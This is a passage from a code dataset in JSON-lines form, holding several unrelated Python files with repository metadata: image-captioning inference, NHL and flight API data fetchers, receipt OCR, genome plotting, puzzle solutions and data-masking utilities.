Image\nfrom torchvision import transforms\n\nBLACK_BACKGROUND_HEIGHT = 50\nOUTPUT_WIDTH = 720\nOUTPUT_HEIGHT = 480\n\nclass ImageCaptionModel:\n\n def __init__( self, args, config):\n print(f\"Loading mPLUG model . . 
.\")\n utils.init_distributed_mode( args )\n self.device = torch.device( args.device )\n cudnn.benchmark = True\n self.tokenizer = BertTokenizer.from_pretrained( config['text_encoder'])\n self.model = MPLUG( config = config, tokenizer=self.tokenizer )\n self.model = self.model.to(self.device)\n self.optimiser = create_optimizer( utils.AttrDict(config['optimizer']), self.model )\n self.checkpoint = torch.load( args.checkpoint, map_location=\"cpu\" )\n \n try:\n self.state_dict = self.checkpoint['model']\n except:\n self.state_dict = self.checkpoint['module']\n \n num_patches = int(config[\"image_res\"] * config[\"image_res\"]/(16*16))\n pos_embed = nn.Parameter(torch.zeros(num_patches + 1, 768).float())\n pos_embed = resize_pos_embed(self.state_dict['visual_encoder.visual.positional_embedding'].unsqueeze(0),\n pos_embed.unsqueeze(0))\n self.state_dict['visual_encoder.visual.positional_embedding'] = pos_embed\n self.model.load_state_dict( self.state_dict, strict=False )\n self.model.eval()\n self.model.to( self.device )\n\n print(f\"Model loaded: {args.checkpoint}\")\n\n def generateDisplayImage( self, generated_caption, cv2_image ):\n display_text = f\"Caption: {generated_caption}\"\n black_background = numpy.zeros([ BLACK_BACKGROUND_HEIGHT, cv2_image.shape[1], 3], dtype=numpy.uint8)\n cv2.putText( black_background, display_text, (int(BLACK_BACKGROUND_HEIGHT/2), int(BLACK_BACKGROUND_HEIGHT/2)), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 250, 0), 1, cv2.LINE_AA )\n stack_image = cv2.vconcat( [black_background, cv2_image] )\n return stack_image\n\n\n def inference( self, transfomred_image, cv2_image ):\n start_time = time.time()\n top_ids, _ = self.model( transfomred_image, \"\", train=False )\n cv2_image = cv2.resize( cv2_image, ( OUTPUT_WIDTH, OUTPUT_HEIGHT ))\n for id in top_ids:\n ans = self.tokenizer.decode(id[0]).replace(\"[SEP]\", \"\").replace(\"[CLS]\", \"\").replace(\"[PAD]\", \"\").strip()\n end_time = time.time()\n fps = 1 / ( end_time - start_time )\n display_image = self.generateDisplayImage( ans, cv2_image )\n cv2.imshow('output', display_image)\n cv2.waitKey(0)\n\n @staticmethod\n def load_image(image, image_size):\n device = \"cuda:0\"\n raw_image = Image.open(str(image)).convert('RGB')\n cv2_image = numpy.array( raw_image )\n cv2_image = cv2_image[:,:,::-1].copy()\n\n w, h = raw_image.size\n\n transform = transforms.Compose([\n transforms.Resize((image_size, image_size) ),\n transforms.ToTensor(),\n transforms.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711))\n ])\n image = transform(raw_image).unsqueeze(0).to(device)\n return image, cv2_image\n \n\ndef getConfigurations():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='./configs/caption_mplug_base.yaml')\n parser.add_argument('--checkpoint', default='./mplug_base.pth')\n parser.add_argument('--device', default='cuda')\n parser.add_argument('--min_length', default=10, type=int)\n parser.add_argument('--max_length', default=25, type=int)\n parser.add_argument('--max_input_length', default=25, type=int)\n\n args = parser.parse_args()\n config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader)\n\n # assign the config variables needed for model initialisation\n config[\"min_length\"] = args.min_length\n config[\"max_length\"] = args.max_length\n config['text_encoder'] = \"bert-base-uncased\"\n config['text_decoder'] = \"bert-base-uncased\"\n config['beam_size'] = 5\n config['optimizer']['lr'] = 2e-5\n\n return args, config\n\ndef main():\n\n args, config = 
getConfigurations()\n image_caption_model = ImageCaptionModel( args, config )\n image_folder = \"./sample_images/\"\n for image in glob.glob( image_folder + '/*' ):\n transformed_image, cv2_image = image_caption_model.load_image( image, image_size=config['image_res'] )\n image_caption_model.inference( transformed_image, cv2_image )\n\nif __name__ == \"__main__\":\n main()", "repo_name": "globalwalkers-aws/image_captioning", "sub_path": "mPLUG/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 4979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.init_distributed_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 22, "usage_type": "name"}, {"api_name": "models.tokenization_bert.BertTokenizer.from_pretrained", "line_number": 23, "usage_type": "call"}, {"api_name": "models.tokenization_bert.BertTokenizer", "line_number": 23, "usage_type": "name"}, {"api_name": "models.model_caption_mplug.MPLUG", "line_number": 24, "usage_type": "call"}, {"api_name": "optim.create_optimizer", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.AttrDict", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "models.vit.resize_pos_embed", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.vconcat", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 74, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 74, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 76, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 76, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 77, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 84, 
"usage_type": "call"}, {"api_name": "yaml.load", "line_number": 93, "usage_type": "call"}, {"api_name": "yaml.Loader", "line_number": 93, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "8863868696", "text": "import logging\nimport json\n\nimport pandas as pd\nimport urllib\nimport urllib.request\nimport sqlite3\nimport sqlalchemy as sa\n\nfrom tqdm import tqdm\n\nfrom settings import DATABASE_NAME\nfrom misc_functions import import_data_from_sql, get_json_data_from_link, insert_into_db\n\npd.set_option('display.max_columns', None)\n\nlogging.basicConfig(level='INFO')\nlogger = logging.getLogger()\n\n# Settings\nplayer_info_cols = ['player_id', \n 'firstName', 'lastName', 'nationality', 'birthCity',\n 'position',\n 'birthDate',\n 'birthStateProvince',\n 'height',\n 'weight', 'shootsCatches']\n\n\nengine = sa.create_engine(f'sqlite:///{DATABASE_NAME}')\n\nurl_prefix = 'https://statsapi.web.nhl.com'\npeople_prefix = '/api/v1/people/'\n\n\ndef get_player_info(player):\n \n player_info_df = pd.DataFrame([], columns=player_info_cols)\n \n player_id = player['player_id']\n player_url = url_prefix + people_prefix + str(player_id)\n player_details_dict = get_json_data_from_link(player_url)\n\n if player_details_dict is None:\n return None\n\n player_dict = player_details_dict.get('people')\n player_info_df = player_info_df.append(player_dict[0], ignore_index=True)\n \n if len(player_dict) > 1:\n logger.warning('MORE THAN ONE PERSON!')\n\n # Extract useful primary position\n if 'primaryPosition' in player_info_df.columns:\n\n player_position_dict = player_info_df[['primaryPosition']].to_dict(orient='index')\n\n primary_position_dict = [[id, data.get('primaryPosition').get('abbreviation') ]\n for id, data in player_position_dict.items()]\n \n position_df = pd.DataFrame(\n primary_position_dict, columns=['index', 'position'])\n position_df.set_index('index', inplace=True)\n\n player_w_position = pd.merge(player_info_df, \n position_df, \n left_index=True,\n right_index=True,\n suffixes=['_old', ''])\n else:\n player_w_position = player_info_df.copy()\n player_w_position['position'] = None\n \n # Remove remaining dicts from dataframe\n if 'currentTeam' in player_w_position.columns:\n player_w_position.drop(\n ['currentTeam'], \n axis=1,\n inplace=True)\n if 'primaryPosition' in player_w_position.columns:\n player_w_position.drop(\n [ 'primaryPosition'],\n axis=1,\n inplace=True)\n player_w_position.rename(columns={'id': 'player_id'}, inplace=True)\n\n return player_w_position\n\n\ndef get_player_data():\n\n player_games = import_data_from_sql('game_players')\n player_info = import_data_from_sql('player_info')\n\n player_info_not_na = player_info[~player_info['firstName'].isna()]\n\n if player_games.empty :\n logger.info('No games have been processed.')\n return None\n elif player_info_not_na.empty:\n logger.info('No player info has been downloaded. 
Processing all players')\n players_ids = player_games[['player_id']].drop_duplicates()\n else:\n players_unique = player_games[['player_id']].drop_duplicates()\n players_ids = players_unique[~players_unique['player_id'].isin(\n player_info_not_na['player_id'])]\n\n # Get player data \n for _, player in tqdm(players_ids.iterrows(), total=players_ids.shape[0]):\n print(player['player_id'])\n player_info_updated = get_player_info(player)\n\n if player_info_updated is not None:\n player_info_updated_cleaned = player_info_updated[~player_info_updated['firstName'].isna()]\n if not player_info_updated_cleaned.empty:\n insert_into_db(\n player_info_updated_cleaned[player_info_cols], 'player_info')\n\n\n \n", "repo_name": "lmanzer/nhl_analysis", "sub_path": "src/nhl_api/get_player_info.py", "file_name": "get_player_info.py", "file_ext": "py", "file_size_in_byte": 3814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.set_option", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 30, "usage_type": "call"}, {"api_name": "settings.DATABASE_NAME", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "misc_functions.get_json_data_from_link", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 65, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 92, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 109, "usage_type": "call"}, {"api_name": "misc_functions.insert_into_db", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "6728447208", "text": "import requests\nimport json\nimport pandas as pd\n\n#INITIALISE\nwith open('keyfile') as keyfile:\n API_KEY = keyfile.read()\n\n# lambda for quick jupyter representation of a plane\nuseful_details = ['Source',\n 'Destination',\n 'alt',\n 'reg_number',\n 'flag',\n ]\nshow_frame = lambda df : df[useful_details].sort_values(['alt','Destination'])\n\n# If no bounding box provided, uses London\nLONDON_BOX = (51.15,-0.91,51.96,0.39)\n\n# Requests\nURL = 'https://airlabs.co/api/v9/'\nendpoint = lambda e: URL + e\n\n# Get Static Data\nwith open('airports.json') as airport_data:\n airports = json.load(airport_data)\n\n# Dictionary for turning iata_codes into airport names\n#TO DO: add cities to this\ncodes = {ap['iata_code']:ap['name'] \n for ap in airports if 'iata_code' in ap.keys()\n }\n\ndef get_local_airports(bbox=LONDON_BOX):\n output = []\n for ap in airports:\n if (bbox[0] 3.5 * taille de l'image\n\n if contours_image.si_image_bien_cadre(image, contours):\n\n # wrap_perspective\n img_redresse = imgutils.wrap_perspective(base.copy(), imgutils.contour_to_rect(rect))\n if display_image: imgutils.affiche(img_redresse)\n\n image_final = traitement_image.traitement_apres_recadrage_2(img_redresse)\n # affiche_total\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n # ==================== Pas de recadrage d'image ===========================\n # si cadre détecté < 3.5 * taille de 
l'image\n\n else:\n image_final = traitement_image.traitement_apres_recadrage_2(base)\n # --- lecture image ------\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n return total\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Test le programme sur un dataset\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef table_comparaison():\n df = pd.read_csv(\"table/table_de_verification_dataset.csv\", sep=';')\n for i in range(len(df)):\n num = df.loc[i, 'numero']\n print(num)\n try:\n total = main(\"dataset/\" + str(num) + \"-receipt.jpg\", False)\n # total = main(\"data_2/\" + str(num) +\".jpg\", False) #2\n except:\n total = '0'\n df.loc[i, 'total_obtenu'] = total\n df[\"result\"] = df.apply(lambda row: True if float(row[\"total\"]) == float(row[\"total_obtenu\"]) else False, axis=1)\n count = df['result'].value_counts()\n vrai = len(df[df['result'] == True])\n print('pourcentage', (int(vrai) / len(df)) * 100)\n print(df)\n print(count)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Chronomètre + Lancement fonction\n# ----------------------------------------------------------------------------------------------------------------------\n\nstart = time.time()\n\n#print(\"LE TOTAL EST : \", main(\"data/sample.jpg\", True))\n#table_comparaison()\n\nend = time.time()\nexecutionTime = end - start\nprint('Temps d\\'exécution : ', executionTime, ' s')\n", "repo_name": "maelle9/Lecture-automatique-de-facture", "sub_path": "main_traitement.py", "file_name": "main_traitement.py", "file_ext": "py", "file_size_in_byte": 3345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "traitement_image.silhouette", "line_number": 13, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 14, "usage_type": "call"}, {"api_name": "contours_image.extraction_contour", "line_number": 17, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 18, "usage_type": "call"}, {"api_name": "contours_image.ten_contours", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 22, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 23, "usage_type": "call"}, {"api_name": "imgutils.get_receipt_contour", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 27, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 28, "usage_type": "call"}, {"api_name": "contours_image.si_image_bien_cadre", "line_number": 33, "usage_type": "call"}, {"api_name": "imgutils.wrap_perspective", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.contour_to_rect", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 37, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 39, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 41, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 42, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 48, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 50, 
"usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 60, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "71360384169", "text": "\"\"\"Plots the distribution of variants across the genome, stained by data source.\"\"\"\n\nimport argparse\nimport pathlib\nimport pandas as pd\n\n# plotting\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import BrokenBarHCollection\nfrom matplotlib.lines import Line2D\n\n\ndef chromosome_collections(df, y_positions, height, **kwargs):\n \"\"\"\n Yields BrokenBarHCollection of features that can be added to an Axes\n object.\n Parameters\n ----------\n df : pandas.DataFrame\n Must at least have columns ['chrom', 'start', 'end', 'color']. If no\n column 'width', it will be calculated from start/end.\n y_positions : dict\n Keys are chromosomes, values are y-value at which to anchor the\n BrokenBarHCollection\n height : float\n Height of each BrokenBarHCollection\n Additional kwargs are passed to BrokenBarHCollection\n \"\"\"\n del_width = False\n if 'width' not in df.columns:\n del_width = True\n df['width'] = df['end'] - df['start']\n for chrom, group in df.groupby('chrom'):\n yrange = (y_positions[chrom], height)\n xranges = group[['start', 'width']].values\n yield BrokenBarHCollection(\n xranges, yrange, facecolors=group['colors'], **kwargs)\n if del_width:\n del df['width']\n\n\ndef plot_chromsome_distribution(ideo,variants,ax):\n # Height of each ideogram\n chrom_height = 0.5\n\n # Spacing between consecutive ideograms\n chrom_spacing = 1\n\n # Height of the variant track. Should be smaller than `chrom_spacing` in order to\n # fit correctly\n variant_height = 0.8\n\n # Padding between the top of a gene track and its corresponding ideogram\n variant_padding = 0.1\n\n # Decide which chromosomes to use\n chromosome_list = ['chr%s' % i for i in range(1, 23)]\n\n # Keep track of the y positions for ideograms and genes for each chromosome,\n # and the center of each ideogram (which is where we'll put the ytick labels)\n ybase = 0\n chrom_ybase = {}\n variant_ybase = {}\n chrom_centers = {}\n\n # Iterate in reverse so that items in the beginning of `chromosome_list` will\n # appear at the top of the plot\n for chrom in chromosome_list[::-1]:\n chrom_ybase[chrom] = ybase\n chrom_centers[chrom] = ybase + chrom_height / 2.\n variant_ybase[chrom] = ybase - variant_height - variant_padding\n ybase += chrom_height + chrom_spacing\n\n # Filter out chromosomes not in our list\n ideo = ideo[ideo['chrom'].apply(lambda x: x in chromosome_list)]\n\n # Add a new column for width\n ideo['width'] = ideo.end - ideo.start\n\n # Colors for different chromosome stains and variant sources\n color_lookup_ideogram = {\n 'gneg': (1., 1., 1.),\n 'gpos25': (.6, .6, .6),\n 'gpos50': (.4, .4, .4),\n 'gpos75': (.2, .2, .2),\n 'gpos100': (0., 0., 0.),\n 'acen': (.8, .4, .4),\n 'gvar': (.8, .8, .8),\n 'stalk': (.9, .9, .9),\n }\n\n color_lookup_variants = {\n 'GnomAD': '#e01b22',\n 'Eichler': '#22e01b',\n 'Biobank': '#1b28e0',\n 'DGV': '#e07a1b'\n }\n\n # Add a new column for colors\n ideo['colors'] = ideo['gieStain'].apply(lambda x: color_lookup_ideogram[x])\n\n # Same thing for the variants\n variants = variants[variants['chrom'].apply(lambda x: x in chromosome_list)]\n variants['width'] = variants.end - variants.start\n variants['colors'] = 
variants['origin'].apply(\n lambda x: color_lookup_variants[x])\n\n # Now all we have to do is call our function for the ideogram data...\n for collection in chromosome_collections(ideo, chrom_ybase, chrom_height, linewidths=1, edgecolors='black'):\n ax.add_collection(collection)\n\n # ...and the gene data\n for collection in chromosome_collections(\n variants, variant_ybase, variant_height, alpha=0.5, linewidths=0\n ):\n ax.add_collection(collection)\n\n # add custom legend\n custom_lines = [Line2D([0], [0], color=color_lookup_variants['GnomAD'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Eichler'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Biobank'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['DGV'], lw = 3)]\n\n ax.legend(custom_lines, ['GnomAD', 'Eichler', 'Biobank', 'DGV'],loc='lower right')\n\n # Axes tweaking\n ax.set_yticks([chrom_centers[i] for i in chromosome_list])\n ax.set_yticklabels(chromosome_list)\n ax.axis('tight')\n return ax\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "jakob-he/TADA", "sub_path": "manuscript/SCRIPTS/chromosome_plot.py", "file_name": "chromosome_plot.py", "file_ext": "py", "file_size_in_byte": 4559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.collections.BrokenBarHCollection", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "23702820719", "text": "import time\n\nstart = time.time()\n\nfrom math import prod\n\nfrom fractions import Fraction as simplest_form\n\nnumerators = []\n\ndenominators = []\n\nfor n in range(10, 100):\n for d in range(n + 1, 100):\n f = n / d\n for a in str(n):\n for b in str(d):\n if int(a) == int(b) and int(a) != 0:\n new_n = str(n).replace(a, '', 1)\n new_d = str(d).replace(b, '', 1)\n if int(new_d) != 0 and int(new_n) / int(new_d) == f:\n numerators.append(n)\n denominators.append(d)\n break\n\nsolution = simplest_form(prod(numerators), prod(denominators))\n\nprint(solution)\n\nend = time.time()\n\n# Executes in 0.0310 seconds\nprint(end - start)\n", "repo_name": "Cikguseven/Project-Euler", "sub_path": "Solutions/33.py", "file_name": "33.py", "file_ext": "py", "file_size_in_byte": 770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 3, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 26, "usage_type": "call"}, {"api_name": "math.prod", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "35452538855", "text": "\n# https://leetcode-cn.com/problems/subsets/\n\n# https://leetcode-cn.com/problems/subsets/solution/zi-ji-by-leetcode/\n\n\n# https://leetcode-cn.com/problems/subsets/solution/hui-su-si-xiang-tuan-mie-pai-lie-zu-he-zi-ji-wen-t/\n\nfrom typing import List\n\nclass Solution:\n # 递归\n def subsets(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n output = [[]]\n\n for num in nums:\n tmp = []\n for curr in output:\n tmp = tmp + [curr + [num]]\n output = output + tmp\n return output\n\n # 回溯\n # 幂集是所有长度从 0 到 n 所有子集的组合。\n # 
回溯法是一种探索所有潜在可能性找到解决方案的算法。如果当前方案不是正确的解决方案,\n # 或者不是最后一个正确的解决方案,则回溯法通过修改上一步的值继续寻找解决方案。\n def subsetsII(self, nums:List[int]):\n def backtrack(first=0, curr=[]):\n if len(curr) == k:\n output.append(curr[:])\n\n for i in range(first, n):\n curr.append(nums[i])\n backtrack(i+1, curr)\n curr.pop()\n\n output = []\n n = len(nums)\n for k in range(n+1):\n backtrack()\n return output\n\n # bit\n def subsetsIII(self, nums:List[int]):\n n = len(nums)\n output = []\n\n for i in range(2 ** n, 2**(n+1)):\n bitmask = bin(i)[3:]\n output.append([nums[j] for j in range(n) if bitmask[j] == '1'])\n\n return output\n\n\n\n\ns = Solution()\nprint(s.subsetsIII(nums=[1,2,3]))", "repo_name": "azhu51/leetcode-practice", "sub_path": "top_interview/medium_array_78.py", "file_name": "medium_array_78.py", "file_ext": "py", "file_size_in_byte": 1462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "72032123369", "text": "#!/usr/bin/env python3\n\nimport sys, os, subprocess\nfrom fileinput import FileInput\nimport os.path\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\n# arguments to this script:\n# - meeting number\n# - real time HH:MM when recording starts\n# - crs_id/semester of offering\nif (len(sys.argv) != 4):\n print (sys.argv[0],\"must be invoked with crs_id/semester, meeting-number, astart-time (HH:MM), and \")\n sys.exit()\n\nmtg_nbr = str(sys.argv[2]).zfill(2)\n\n# CS-428+828/202030 5 11:10\n# teaching/CS-428+828/202030/0_nonweb/zoom/talk/05*.srt\n# _data/teaching/CS-428_828/202030/transcript/talk/05.yml\n\nTALK_SRC = 'teaching/' + sys.argv[1] + '/0_nonweb/zoom/talk/' + mtg_nbr + '_otter.ai.srt'\nprint(TALK_SRC)\nTALK_DST = '_data/teaching/' + sys.argv[1].replace('+','_') + '/transcript/talk/' + mtg_nbr + '.yml'\nprint(TALK_DST)\nstarttime = sys.argv[3].split(':')\nstd = timedelta(hours=int(starttime[0]),minutes=int(starttime[1]))\n#atfilepath = sys.argv[2]\n\nwith open(TALK_SRC,'r') as atf, open(TALK_DST, 'w') as ydf:\n curr_hm_stamp = ''\n curr_speaker = ''\n new_block = 0\n for line in atf:\n line = line.strip()\n if (len(line)):\n #print(line)\n if '-->' in line:\n #print ('case: -->')\n startstop = line.split(' ')\n #print(startstop)\n #ydf.write(str(startstop) + '\\n')\n try:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S.%f')\n except:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S,%f')\n if curr_hm_stamp != ts0.strftime('%Hh%M'):\n new_block = 1\n ydf.write(ts0.strftime('%Hh%M') + ':\\n')\n ydf.write(' talks:\\n')\n curr_hm_stamp = ts0.strftime('%Hh%M')\n elif ':' in line:\n #print ('case: :')\n spoken = line.split(':')\n #print(spoken)\n if new_block == 1 or curr_speaker != spoken[0]:\n #spkr = 'SSS'\n #if (spoken[0] == 'Daryl Hepting' or spoken[0] == 'Unknown'):\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n #else:\n #ydf.write(' - persid: SSS\\n')\n ydf.write(' msg: >-\\n')\n curr_speaker = spoken[0]\n #print (' \\\"' + spoken[1])\n #for i in range(2,len(spoken)):\n # print (' ' + spoken[i])\n new_block = 0\n for i in range(1,len(spoken)):\n ydf.write (' ' + spoken[i].strip() + '\\n')\n elif len(line.strip().split()) > 1 or not line.isnumeric():\n #print ('case: len(line.strip().split()) > 1 or line.isalpha()')\n if new_block == 1 :#or curr_speaker != spoken[0]:\n 
ydf.write(' - persid: ' + spoken[0] + '\\n')\n ydf.write(' msg: >-\\n')\n new_block = 0\n ydf.write (' ' + line.strip() + '\\n')\n", "repo_name": "dhhepting/dhhepting.github.io", "sub_path": "script/000_not-needed/transcribe-talk.py", "file_name": "transcribe-talk.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "8547586610", "text": "import torch\nimport torch.nn.functional as F\nimport torchvision\nimport os\nfrom imagegym.config import cfg\nimport numpy as np\nimport torch\n\ndef create_fixed_mask_missingness(shape:tuple):\n \"\"\"\n use only for chairs dataset since it is always sampling 4096 points\n \"\"\"\n # assert len(x.shape) == 5 #so this is chairs\n bs, ch, h, w, d = shape\n observed_indices = random_indices(4096,h*w*d).unsqueeze(0)\n all = torch.zeros((h*w*d),dtype=bool).flatten()\n all[observed_indices]=True\n observed_mask = all.reshape(h,w,d)\n\n # observed_mask = torch.zeros_like(x,dtype=bool)\n # observed_mask[:,:,observed_indices]=True\n observed_mask = np.tile(observed_mask[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n return observed_mask, observed_mask_point\n \n\ndef random_indices(num_indices, max_idx):\n \"\"\"Generates a set of num_indices random indices (without replacement)\n between 0 and max_idx - 1.\n\n Args:\n num_indices (int): Number of indices to include.\n max_idx (int): Maximum index.\n \"\"\"\n # It is wasteful to compute the entire permutation, but it looks like\n # PyTorch does not have other functions to do this\n permutation = torch.randperm(max_idx)\n # Select first num_indices indices (this will be random since permutation is\n # random)\n return permutation[:num_indices]\n\n\ndef create_mask_missingness(x, missingness):\n \"\"\"\n :param x: input tensor of batch\n :param missingness: missingness value float\n :return: x with missingness applied\n :return: observed mask of non-missingness\n \"\"\" \n if missingness == 1:\n missing_rate = np.random.rand(1) * 0.9 \n elif missingness > 0:\n missing_rate = missingness\n missing_rate = np.random.uniform(low=0,high=missing_rate)\n elif missingness ==0:\n missing_rate = -1\n\n if len(x.shape) == 3: #shapenet\n raise NotImplementedError\n bs, h, ch = x.shape\n w=1\n observed_mask_0 = (np.random.rand(h*w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis, :, np.newaxis], (bs,1,ch))\n observed_mask_point= None\n\n elif len(x.shape) == 4:\n bs, ch, h, w = x.shape\n observed_mask_0 = 
